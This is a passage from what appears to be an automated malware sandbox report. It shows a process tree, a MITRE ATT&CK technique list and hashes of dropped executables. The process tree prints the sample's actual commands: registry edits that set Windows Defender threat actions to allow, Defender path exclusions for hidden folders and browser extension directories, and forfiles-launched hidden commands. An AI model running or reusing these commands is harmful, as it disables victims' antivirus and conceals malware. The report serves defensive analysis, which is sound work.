    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3636
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5704
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4884
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5972
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6076
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2812
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5392
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6108
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3364
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1056
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4164
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1816
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1528
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5236
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6160
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:640
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5256
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5392
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1056
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5492
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6236
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ADJLsahCU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ADJLsahCU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQANlvmTAvZU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQANlvmTAvZU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZjcxajBIsNTC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZjcxajBIsNTC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mWJfrhglotUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mWJfrhglotUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyWMmqtuSNndeGVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyWMmqtuSNndeGVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  PID:5640
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4548
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:4628
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5264
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6912
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1552
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6480
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:6104
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6308
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4596
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:480
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:6036

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5984 -ip 5984
1⤵
PID:5788

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
PID:6164
- C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
  "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
  2⤵
  PID:7000

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:7032

C:\Users\Admin\AppData\Local\Temp\7zS5B4A.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS5B4A.tmp\Install.exe it /BKhdidCfTN 385118 /S
1⤵
PID:6964
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:5812
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:3636
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:4164
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:1956
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    PID:4720
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:6684
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:6160
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    PID:5340
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:2488
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:6336

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
PID:6592
- C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
  2⤵
  PID:6016

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Credentials in Registry

T1552.002

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\GameSyncLink\GameService.exe

Filesize
288KB

MD5
d9ec6f3a3b2ac7cd5eef07bd86e3efbc

SHA1
e1908caab6f938404af85a7df0f80f877a4d9ee6

SHA256
472232ca821b5c2ef562ab07f53638bc2cc82eae84cea13fbe674d6022b6481c

SHA512
1b6b8702dca3cb90fe64c4e48f2477045900c5e71dd96b84f673478bab1089febfa186bfc55aebd721ca73db1669145280ebb4e1862d3b9dc21f712cd76a07c4

Download Submit
C:\Program Files (x86)\GameSyncLink\installg.bat

Filesize
284B

MD5
5dee3cbf941c5dbe36b54690b2a3c240

SHA1
82b9f1ad3ca523f3794e052f7e67ecdcd1ae87e1

SHA256
98370b86626b8fd7a7cac96693348045b081326c49e2421113f49a5ea3588edb

SHA512
9ee431d485e2f09268a22b287b0960859d2f22db8c7e61309a042999c436b3de74f5d75837b739e01122a796ad65bc6468d009ec6ddf4962f4ff288155410556

Download Submit
C:\ProgramData\Are.docx

Filesize
11KB

MD5
a33e5b189842c5867f46566bdbf7a095

SHA1
e1c06359f6a76da90d19e8fd95e79c832edb3196

SHA256
5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454

SHA512
f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

Download Submit
C:\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\Users\Admin\1000021002\bcb8ba0b64.exe

Filesize
1.1MB

MD5
39054c205bff87cbd6de0c61ffbf7781

SHA1
34fe59ca9bd1af544893796aa7a36eb5a6e5d02b

SHA256
d3dd982808d14b9de94fc531bb082f51207c1915b8f7159b8c55b7e5fbfe551d

SHA512
93d4afd06142efbe55d5b484016c8214a1d5fb1200ab0eb1f4d9ac82be879074ab07c3498fccf7334822cf77be693b56931cb2018c9146e89cee1fd47708e88b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\1a3af98d-da05-4c6b-9467-1cceb4b04d07.tmp

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
e05757b5b0adc66f7a7c16225621c103

SHA1
ffe80809115e3ad1dc733724178e6aeebdb8208c

SHA256
120fc9b9be0e32e4864687336f8645ddc101243771ccd7c9ce5aa384c119104e

SHA512
169cb0c97efba436703b1f2ddf3157077fe858810cd6c1bc21e9782aecd97f81e6a510646594084aa399ce4c5b40131c7a9444a07d7a9bb51497fe1c30153d4c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
78KB

MD5
dc606eff0373dd25bcf45d8dd12e4061

SHA1
155eda6427d0ed6e5505ca99daad248f0d81d0f7

SHA256
c266d054a9a81d15f369893bdc6c49fe7e8f1834db25bc94ce3bea4af96e0e19

SHA512
eebebcb874952f19f61614205219582b514ca37feb37f3416ef58eb940caa9fba129428a29c9de8aa256d1c78b3bad6a6cb47323a17fcbd3a7c6752684e635c7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
627073ee3ca9676911bee35548eff2b8

SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e

SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
2e8eb51096d6f6781456fef7df731d97

SHA1
ec2aaf851a618fb43c3d040a13a71997c25bda43

SHA256
96bfd9dd5883329927fe8c08b8956355a1a6ceb30ceeb5d4252b346df32bc864

SHA512
0a73dc9a49f92d9dd556c2ca2e36761890b3538f355ee1f013e7cf648d8c4d065f28046cd4a167db3dea304d1fbcbcea68d11ce6e12a3f20f8b6c018a60422d2

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000019001\amert.exe

Filesize
1.8MB

MD5
970747403ac8b70edfbfe57c1d007276

SHA1
39d5a1763ff8901d27e75e91493d416319817fb0

SHA256
50436d0a97921514972677573da8d808407e42be73f9221472e9a85ee65b2200

SHA512
44fa98b132688cf9ee17c931ed111ce8f074b7f6571a02f9e2f717d0d7ac2fa1fd0cb9a40c6ef7dd300ce5f6b9980e6a69e668475bb6184ad8d90b70d918687e

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000020001\7ad92a0bdc.exe

Filesize
2.1MB

MD5
0a421d5c7262bfd1bf5c307fbedae9c6

SHA1
4b8de2b7628f6a9da67921cfec97c0ad89914fc9

SHA256
564bf9705ee08d701a81185d20394531434d003939f0179c2ec6482760ae358b

SHA512
af6eed0b11356f9b6e88a12e71eaf76e036f7a1e7bed57c478ffa3643677b8445a071ebb49e3c6c04a3079f1cd0e9196feb44d6bad31f916cd5823f862f8b413

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000066001\swiiiii.exe

Filesize
321KB

MD5
1c7d0f34bb1d85b5d2c01367cc8f62ef

SHA1
33aedadb5361f1646cffd68791d72ba5f1424114

SHA256
e9e09c5e5d03d21fca820bd9b0a0ea7b86ab9e85cdc9996f8f1dc822b0cc801c

SHA512
53bf85d2b004f69bbbf7b6dc78e5f021aba71b6f814101c55d3bf76e6d058a973bc58270b6b621b2100c6e02d382f568d1e96024464e8ea81e6db8ccd948679d

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000071001\jok.exe

Filesize
304KB

MD5
8510bcf5bc264c70180abe78298e4d5b

SHA1
2c3a2a85d129b0d750ed146d1d4e4d6274623e28

SHA256
096220045877e456edfea1adcd5bf1efd332665ef073c6d1e9474c84ca5433f6

SHA512
5ff0a47f9e14e22fc76d41910b2986605376605913173d8ad83d29d85eb79b679459e2723a6ad17bc3c3b8c9b359e2be7348ee1c21fa2e8ceb7cc9220515258d

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000073001\swiiii.exe

Filesize
158KB

MD5
586f7fecacd49adab650fae36e2db994

SHA1
35d9fb512a8161ce867812633f0a43b042f9a5e6

SHA256
cf88d499c83da613ad5ccd8805822901bdc3a12eb9b15804aeff8c53dc05fc4e

SHA512
a44a2c99d18509681505cf70a251baf2558030a8648d9c621acc72fafcb2f744e3ef664dfd0229baf7c78fb72e69f5d644c755ded4060dcafa7f711d70e94772

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe

Filesize
405KB

MD5
4c03ddbf5fe9e55346e426b78c9a9b2c

SHA1
e8ad3b30d021822fe4c9f6d9c3645bd712224ee7

SHA256
93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb

SHA512
9abc493c5e467667890933b0663370797734fb625cc0fa80f59195606315bbf77c4f4882b20f5c4b1f999dbfb397bacd65c992ef071b21a076b056a55431e325

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000079001\gold.exe

Filesize
564KB

MD5
f15a9cfa3726845017a7f91abe0a14f7

SHA1
5540ae40231fe4bf97e59540033b679dda22f134

SHA256
2dec75328413d4c278c119db42920fb183a88a5398d56ecc80c8cc74fba13071

SHA512
1c2af9608736ad6a02d093f769fe5ec5a06cb395a639e021d4ee3f6c46cebc8c101e7db1064984f801ad3bee65d81b95fe6e2e60c0ec949bb172ba9c455b9869

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000080001\alexxxxxxxx.exe

Filesize
2.7MB

MD5
31841361be1f3dc6c2ce7756b490bf0f

SHA1
ff2506641a401ac999f5870769f50b7326f7e4eb

SHA256
222393a4ab4b2ae83ca861faee6df02ac274b2f2ca0bed8db1783dd61f2f37ee

SHA512
53d66fa19e8db360042dadc55caaa9a1ca30a9d825e23ed2a58f32834691eb2aaaa27a4471e3fc4d13e201accc43160436ed0e9939df1cc227a62a09a2ae0019

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000081001\install.exe

Filesize
4.2MB

MD5
0f52e5e68fe33694d488bfe7a1a71529

SHA1
11d7005bd72cb3fd46f24917bf3fc5f3203f361f

SHA256
efd29c35766c607aa15d1cb83dec625739791b1616ad37d5b47e78cdb8a42ca8

SHA512
238fbb1c04eef2f2005cb7abf0223e3cd062d9d2840966292e19dcaa495609e134a0bdc35389ae9925ecfc787a13772d3ac7b29058579f702bc849dd0343c400

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe

Filesize
418KB

MD5
0099a99f5ffb3c3ae78af0084136fab3

SHA1
0205a065728a9ec1133e8a372b1e3864df776e8c

SHA256
919ae827ff59fcbe3dbaea9e62855a4d27690818189f696cfb5916a88c823226

SHA512
5ac4f3265c7dd7d172284fb28c94f8fc6428c27853e70989f4ec4208f9897be91720e8eee1906d8e843ab05798f3279a12492a32e8a118f5621ac5e1be2031b6

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000095001\angelfederal.exe

Filesize
1.1MB

MD5
a412943d7658cb194744ffa4008f6944

SHA1
48c5a3b7315c869c93723ae041e38610a32e9555

SHA256
2540722d53870e6dbe6fd73d56b3e12c20d9f4c29fc6d325d6cfd471d8e44ea0

SHA512
ec74c6744dce66dbf8f062c9296fc60f34d6d8997b65bb3de468774e336d2c4a7d6714d195de2d50dd6b532001aea5c9aae16ffc5e539629ee4710a1eaca8763

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000242001\toolspub1.exe

Filesize
245KB

MD5
eab8a9b818ef4e23bd92d7420ee33b77

SHA1
f4751ca6ff4d24c3bfada9ad043835a27f04d2f5

SHA256
130ef444d7e6cd446c98932ce64ec44b56653258965cea4180baba5b570e4b75

SHA512
ce77e817741e460aa813d4efe1750f24f149bb4f7df23a06b7986c4ef09dc5303d0e0585928b78bf2b12dfa76a93f5bc8873fa03c8febe82b9c960ad41d1ff9f

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000243001\4767d2e713f2021e8fe856e3ea638b58.exe

Filesize
4.2MB

MD5
b2762fd3157689d29aa0fccc81005f76

SHA1
6879c6f04b76c9a2af9b0a3ac24eb269cf0a9045

SHA256
9b253e5a74b2a5ef6085c077e129d82a1bc71de1ed570a070495ae709d24b3cf

SHA512
